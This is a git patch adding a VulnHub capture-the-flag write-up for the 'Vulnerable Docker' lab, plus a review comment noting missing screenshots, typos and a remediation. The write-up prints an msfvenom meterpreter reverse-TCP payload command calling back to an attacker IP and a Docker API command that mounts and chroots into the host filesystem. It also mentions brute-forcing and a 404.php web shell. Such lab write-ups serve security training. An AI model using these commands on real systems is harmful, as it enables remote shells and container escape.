From 44155ca6c0191d13cf24fd0856a07a7a6f798a25 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 26 Mar 2021 15:21:40 +0500
Subject: [PATCH] Add files via upload
---
VulnHub/Vulnerable_docker.md | 164 +++++++++++++++++++++++++++++++++++
1 file changed, 164 insertions(+)
create mode 100644 VulnHub/Vulnerable_docker.md
diff --git a/VulnHub/Vulnerable_docker.md b/VulnHub/Vulnerable_docker.md
new file mode 100644
index 0000000..7641f63
--- /dev/null
+++ b/VulnHub/Vulnerable_docker.md
@@ -0,0 +1,164 @@
+# Vulnhub- Vulnerable Docker (Easy)
+
+
+
+We don't need to use `netdiscover` or any other tool to get IP of the box since it already shows at login banner
+
+## NMAP
+
+```
+nmap -p- -sC -sV
+
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
+| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
+| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
+|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
+2375/tcp open docker Docker 17.06.0-ce
+| docker-version:
+| BuildTime: 2017-06-23T21:17:13.228983331+00:00
+| Arch: amd64
+| KernelVersion: 3.13.0-128-generic
+| ApiVersion: 1.30
+| MinAPIVersion: 1.12
+| GitCommit: 02c1d87
+| Version: 17.06.0-ce
+| GoVersion: go1.8.3
+|_ Os: linux
+| fingerprint-strings:
+| FourOhFourRequest:
+| HTTP/1.0 404 Not Found
+| Content-Type: application/json
+| Date: Wed, 24 Mar 2021 18:06:13 GMT
+| Content-Length: 29
+| {"message":"page not found"}
+| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
+| HTTP/1.1 400 Bad Request
+| Content-Type: text/plain; charset=utf-8
+| Connection: close
+| Request
+| GetRequest:
+| HTTP/1.0 404 Not Found
+| Content-Type: application/json
+| Date: Wed, 24 Mar 2021 18:05:48 GMT
+| Content-Length: 29
+| {"message":"page not found"}
+| HTTPOptions:
+| HTTP/1.0 200 OK
+| Api-Version: 1.30
+| Docker-Experimental: false
+| Ostype: linux
+| Server: Docker/17.06.0-ce (linux)
+| Date: Wed, 24 Mar 2021 18:05:48 GMT
+| Content-Length: 0
+| Content-Type: text/plain; charset=utf-8
+| docker:
+| HTTP/1.1 400 Bad Request: missing required Host header
+| Content-Type: text/plain; charset=utf-8
+| Connection: close
+|_ Request: missing required Host header
+8000/tcp open http Apache httpd 2.4.10 ((Debian))
+|_http-generator: WordPress 4.8.1
+| http-robots.txt: 1 disallowed entry
+|_/wp-admin/
+|_http-server-header: Apache/2.4.10 (Debian)
+|_http-title: NotSoEasy Docker – Just another WordPress site
+MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
+```
+
+
+## PORT 2375 (Docker)
+
+Since docker api is exposed we can try connecting to port by listing images
+
+
+
+We can also see which containers are currently running
+
+
+
+
+wordpress:WordPressISBest
+
+## PORT 8000
+
+
+
+
+
+
+Running `wpscan`
+
+
+
+
+
+We can now bruteforce the password for `bob`
+
+
+
+
+
+Using these credentials we can login to wordpress site
+
+
+
+To get a shelll we can edit `404.php` template of the currently active theme
+
+
+
+
+
+Alternatively you can get a meterpreter shell my generating a payload with `msfvenom`
+
+
+
+
+
+
+
+Now in order to do pivoting web shell are not stable (in both windows and linux ) so after we got the intial foothold we may need to stablize our shell in meterpreter we have to sepefically generate a linux payload
+
+`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf`
+
+
+
+
+
+### Unstable shell
+
+
+
+### New meterpreter shell
+
+
+
+
+
+Now we have added the route to subnet `172.18.0.0` for docker container , we can now scan for open ports on the container and since there are more as we saw from enumerating docker port
+
+
+
+Start `socks4a proxy`
+
+
+
+Use `foxyproxy` to switch to socks4a proxy and since port 8022 is open we can see what's there
+
+
+
+
+
+
+
+This container has `docker.sock` which allows to communicate with docker meaning creating , adding ,deleting container so there's a trick to mount the host system on the docker container by uploading `docker` and run command `docker run -it -v /:/host/ chroot /host/ bash ` binary instead we have docker port and we can access those container so we can remotely do this
+
+`docker -H tcp://192.168.1.7:2375 run --rm -it -v /:/host wordpress chroot /host bash`
+
+
+
+And we can read the the flag which means we are on a host machine
+
+
\ No newline at end of file
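Review bot: the screenshots this writeup relies on did not survive the upload, so after "Since docker api is exposed we can try connecting to port by listing images", "Running `wpscan`", "We can now bruteforce the password for `bob`" and most later steps there is only a run of blank `+` lines and the reader never sees the output each sentence refers to; please re-add the images or paste each command with its output as fenced text, the way the NMAP section already does. Smaller fixes in the same file: `nmap -p- -sC -sV` has no target, the bare line `wordpress:WordPressISBest` needs a sentence saying where it came from (presumably the container listing above it), and the typos "shelll", "my generating", "intial", "stablize" and "sepefically" should be corrected. In the docker.sock paragraph the inline command `docker run -it -v /:/host/ chroot /host/ bash` is missing its image name and the sentence runs two thoughts together ("...binary instead we have docker port and we can access those container..."); the complete command two lines later, `docker -H tcp://192.168.1.7:2375 run --rm -it -v /:/host wordpress chroot /host bash`, is the one that actually works, so state that one once. Since the root cause is a Docker daemon reachable on TCP 2375 with no TLS client certificates (the `-H tcp://` connection needs none) plus a container that is handed `docker.sock`, a closing remediation line, keep the daemon on its unix socket or require TLS client auth and never mount docker.sock into an untrusted container, would round out the writeup.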